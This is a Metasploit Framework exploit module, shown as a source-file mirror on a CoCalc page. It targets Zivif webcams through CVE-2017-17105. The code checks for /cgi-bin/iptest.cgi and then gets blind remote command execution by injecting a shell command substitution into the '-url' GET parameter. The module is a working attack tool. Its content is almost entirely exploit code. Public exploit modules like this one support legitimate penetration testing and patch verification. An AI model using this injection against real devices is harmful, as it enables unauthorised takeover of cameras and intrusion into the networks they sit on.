CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/http/zivif_ipcheck_exec.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Zivif Camera iptest.cgi Blind Remote Command Execution',

16
        'Description' => %q{

17
          This module exploits a remote command execution vulnerability in Zivif

18
          webcams.  This is known to impact versions prior to and including v2.3.4.2103.

19
          Exploit was reported in CVE-2017-17105.

20
        },

21
        'License' => MSF_LICENSE,

22
        'Author' => [ 'Silas Cutler (p1nk)' ],

23
        'References' => [

24
          [ 'URL', 'https://seclists.org/fulldisclosure/2017/Dec/42' ],

25
          [ 'CVE', '2017-17105' ]

26
        ],

27
        'Platform' => 'unix',

28
        'Targets' => [

29
          [ 'Automatic Target', {}]

30
        ],

31
        'Payload' => {

32
          'Space' => 1024,

33
          'BadChars' => "\x00\x27",

34
          'DisableNops' => true,

35
          'Compat' =>

36
              {

37
                'PayloadType' => 'cmd',

38
                'RequiredCmd' => 'generic'

39
              }

40
        },

41
        'DefaultOptions' => {

42
          'PAYLOAD' => 'cmd/unix/generic'

43
        },

44
        'Privileged' => false,

45
        'DisclosureDate' => '2017-09-01',

46
        'DefaultTarget' => 0,

47
        'Notes' => {

48
          'Stability' => [ CRASH_SAFE ],

49
          'SideEffects' => [ IOC_IN_LOGS ],

50
          'Reliability' => [ REPEATABLE_SESSION ]

51
        }

52
      )

53
    )

54
  end

55


56
  def check

57
    res = send_request_cgi('uri' => normalize_uri('cgi-bin', 'iptest.cgi'))

58
    unless res

59
      vprint_error('Connection failed')

60
      return Exploit::CheckCode::Unknown

61
    end

62
    unless res.code && res.code == 200

63
      return CheckCode::Safe

64
    end

65


66
    CheckCode::Detected

67
  end

68


69
  def exploit

70
    print_status('Sending request')

71
    cmd = datastore['CMD']

72


73
    res = send_request_cgi(

74
      'uri' => normalize_uri('cgi-bin', 'iptest.cgi'),

75
      'method' => 'GET',

76
      'vars_get' => {

77
        'cmd' => 'iptest.cgi',

78
        '-time' => Time.now.to_i,

79
        '-url' => "$(#{cmd})"

80
      }

81
    )

82


83
    unless res

84
      fail_with(Failure::Unreachable, 'Connection failed')

85
    end

86


87
    if res.code && res.code == 200

88
      print_good('Command sent successfully')

89
    else

90
      fail_with(Failure::UnexpectedReply, 'Unable to send command to target')

91
    end

92
  end

93


94
end

95


96